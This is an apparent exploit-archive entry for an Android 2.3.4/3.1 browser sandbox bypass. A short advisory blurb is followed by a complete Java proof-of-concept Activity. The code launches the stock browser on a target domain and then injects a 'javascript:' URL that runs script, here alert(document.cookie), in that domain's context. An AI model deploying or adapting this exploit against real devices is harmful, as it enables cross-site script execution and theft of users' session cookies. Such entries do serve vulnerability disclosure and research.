35 lines
No EOL
1.2 KiB
Java
35 lines
No EOL
1.2 KiB
Java
source: https://www.securityfocus.com/bid/48954/info
|
|
|
|
Open Handset Alliance Android is prone to a vulnerability that may allow a bypass of the browser sandbox.
|
|
|
|
Successful exploits will allow attackers to execute arbitrary script code within the context of an arbitrary domain.
|
|
|
|
Android 2.3.4 and 3.1 are vulnerable; prior versions may also be affected.
|
|
|
|
public class CasExploit extends Activity
|
|
{
|
|
static final String mPackage = "com.android.browser";
|
|
static final String mClass = "BrowserActivity";
|
|
static final String mUrl = "http://target.domain/";;
|
|
static final String mJavascript = "alert(document.cookie)";
|
|
static final int mSleep = 15000;
|
|
|
|
@Override
|
|
public void onCreate(Bundle savedInstanceState) {
|
|
super.onCreate(savedInstanceState);
|
|
setContentView(R.layout.main);
|
|
startBrowserActivity(mUrl);
|
|
try {
|
|
Thread.sleep(mSleep);
|
|
}
|
|
catch (InterruptedException e) {}
|
|
startBrowserActivity("javascript:" + mJavascript);
|
|
}
|
|
|
|
private void startBrowserActivity(String url) {
|
|
Intent res = new Intent("android.intent.action.VIEW");
|
|
res.setComponent(new ComponentName(mPackage,mPackage+"."+mClass));
|
|
res.setData(Uri.parse(url));
|
|
startActivity(res);
|
|
}
|
|
} |